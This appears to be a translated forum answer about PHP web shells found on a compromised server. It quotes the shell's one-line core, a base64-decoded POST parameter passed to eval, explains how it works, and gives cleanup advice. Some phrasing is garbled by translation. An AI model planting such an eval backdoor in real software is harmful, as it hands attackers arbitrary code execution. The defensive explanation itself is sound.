Story: your server may already have been compromised.
These are PHP rockets - basically harmless where they are, but if they get to your web root, they will allow an attacker to execute any arbitrary code on your server.
The key parts for understanding the shell are:
$xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;");
It takes any code in general from the $_POST variable, base64_decode it, and then runs it through eval when suppressing any errors.
It is possible that they are downloaded through a form on your website and uploaded to a temporary folder as an intermediate step, hoping that they will go to a web accessible location. Another option is that your server already has a shell or rootkit, and it puts these files in any writable folders that it can find.
So what to do about it? Check server logs - if you see successful script connections that you donβt recognize, you may be compromised. Find any downloadable forms on your site and block them (user authentication is required, etc.), and then if you are sure that you have been compromised, do not worry when trying to clear it. Move the new server, transfer clean code, important files and data to a clean server.
source share